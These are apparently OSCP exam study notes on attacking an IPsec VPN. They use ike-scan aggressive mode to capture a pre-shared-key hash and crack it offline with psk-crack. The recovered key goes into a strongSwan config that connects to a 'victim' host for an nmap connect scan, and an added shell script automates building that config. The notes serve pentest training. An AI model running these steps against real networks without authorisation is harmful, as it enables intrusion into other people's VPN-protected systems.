OSCP Notes

500 (IPSEC IKE)

ike-scan IP -A
  • aggressive mode (-A): the responder returns its hash over the PSK in the exchange, not the PSK itself. Add -P (or -Pfile) to print it in psk-crack format and crack it offline: psk-crack -d wordlist file
ike-scan IP -M
  • multi-line (-M): one attribute per line, easy to read
  • SA (Security Association) block: copy it. The Enc, Hash, Group and LifeDuration values are what the client config below has to match.
If SNMP is open, run snmpwalk as well: it can leak VPN PSK details that complement the SA data (hash type, DH group).
LifeDuration is printed as hex bytes (e.g. 0x00007080). Convert it to decimal to get seconds (28800), then divide by 3600 to get hours (8h); that is the ikelifetime value for the config below.
apt install strongswan
Once installed, edit /etc/ipsec.secrets and paste the following (a colon, not a semicolon, before PSK):
VICTIM_IP %any : PSK "paste the plain text PSK"
Edit /etc/ipsec.conf, under "Sample VPN connections" (the lines of the conn body must be indented):
conn BOX_NAME
    type=transport
    keyexchange=ikev1
    left=your_IP
    leftprotoport=tcp
    right=victim-IP
    rightprotoport=tcp
    authby=psk
    esp=3des-sha1
    ike=3des-sha1-modp1024
    ikelifetime=8h
    auto=start
Match ike= and ikelifetime= to what ike-scan reported (strongSwan names the DH group modp1024, not mod1024). Then start strongSwan in the foreground so errors are visible:
ipsec start --nofork
  • leftprotoport=tcp & rightprotoport=tcp: restrict the transport-mode SA to TCP.
  • set these if TCP ports are hidden from us (the box only answers TCP that arrives inside the SA).
If there are no errors, run the nmap scan with the -sT option.
(You cannot use the default SYN scan (-sS) when the client is on a VPN service: nmap's raw packets bypass the kernel's IPsec policy, so they never travel inside the SA. -sT uses the normal socket API, so the kernel protects the traffic and the full handshake completes through the SA.)
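The whole procedure above as one added example script (not from the original notes): it pulls the SA block out of ike-scan -M output, builds the strongSwan ike= proposal and ikelifetime from it, renders ipsec.secrets and the ipsec.conf conn block, and ends with the start and connect-scan commands. The ike-scan output is a constructed sample, the IPs, connection name and PSK are placeholders, and esp=3des-sha1 is carried over from the notes because ike-scan only reports the phase 1 proposal. It also goes a little beyond the notes by handling an AES proposal (Enc=AES plus KeyLength), which strongSwan spells aes128/aes256.

```shell
#!/bin/sh
# Added example (not from the original notes): ike-scan -M output -> strongSwan
# IKEv1 transport-mode PSK config. IPs, conn name and PSK are placeholders.

# Constructed sample of `ike-scan IP -M` output (same layout ike-scan prints,
# leading tabs shown as spaces; cookie and lifetime values are illustrative).
SAMPLE_IKE_SCAN='10.10.10.5  Main Mode Handshake returned
    HDR=(CKY-R=0123456789abcdef)
    SA=(
        Enc=3DES
        Hash=SHA1
        Group=2:modp1024
        Auth=PSK
        LifeType=Seconds
        LifeDuration(4)=0x00007080)'

# sa_attr KEY OUTPUT: value of "KEY=value" in the SA block (trailing ")" dropped).
sa_attr() {
    printf '%s\n' "$2" | sed -n "s/^[[:space:]]*$1=\([^)]*\).*$/\1/p" | head -n 1
}

# LifeDuration is a hex byte string (0x00007080) -> seconds -> whole hours.
lifeduration_seconds() { echo $(( $1 )); }        # 0x00007080 -> 28800
lifeduration_hours()   { echo $(( $1 / 3600 )); } # 0x00007080 -> 8

# Hours for ikelifetime=, straight from the ike-scan output.
ike_lifetime_hours() { lifeduration_hours "$(sa_attr 'LifeDuration(4)' "$1")"; }

# Phase 1 proposal in strongSwan syntax: enc-hash-dhgroup, e.g. 3des-sha1-modp1024.
# ike-scan prints "Group=2:modp1024"; strongSwan wants only the modp name.
# AES is reported as Enc=AES plus KeyLength=128, which strongSwan spells aes128.
ike_proposal() {
    enc=$(sa_attr Enc "$1" | tr 'A-Z' 'a-z')
    hash=$(sa_attr Hash "$1" | tr 'A-Z' 'a-z')
    group=$(sa_attr Group "$1")
    keylen=$(sa_attr KeyLength "$1")
    if [ "$enc" = "aes" ] && [ -n "$keylen" ]; then enc="aes$keylen"; fi
    echo "$enc-$hash-${group#*:}"
}

# /etc/ipsec.secrets line: <victim> %any : PSK "<secret>" (colon, not semicolon).
gen_ipsec_secrets() {   # $1=victim_ip $2=plaintext PSK
    printf '%s %%any : PSK "%s"\n' "$1" "$2"
}

# /etc/ipsec.conf conn block. esp= is the phase 2 proposal, which ike-scan does
# not report; 3des-sha1 is the value used in the notes above.
gen_ipsec_conf() {      # $1=conn $2=my_ip $3=victim_ip $4=ike_proposal $5=lifetime_hours
    cat <<EOF
conn $1
    type=transport
    keyexchange=ikev1
    left=$2
    leftprotoport=tcp
    right=$3
    rightprotoport=tcp
    authby=psk
    esp=3des-sha1
    ike=$4
    ikelifetime=${5}h
    auto=start
EOF
}

# Usage (as root, placeholder addresses): render both files, start strongSwan
# in the foreground so errors are visible, then connect-scan through the SA.
#   gen_ipsec_secrets 10.10.10.5 'ThePlaintextPSK' > /etc/ipsec.secrets
#   gen_ipsec_conf BOX 10.10.14.2 10.10.10.5 \
#       "$(ike_proposal "$SAMPLE_IKE_SCAN")" "$(ike_lifetime_hours "$SAMPLE_IKE_SCAN")" \
#       >> /etc/ipsec.conf
#   ipsec start --nofork &
#   nmap -sT -p- 10.10.10.5
```

Feed the real `ike-scan IP -M` output into ike_proposal and ike_lifetime_hours instead of the sample; if the proposal the box reports does not match what you put in ike=, strongSwan will log NO_PROPOSAL_CHOSEN when it starts, which is the first thing to check before scanning.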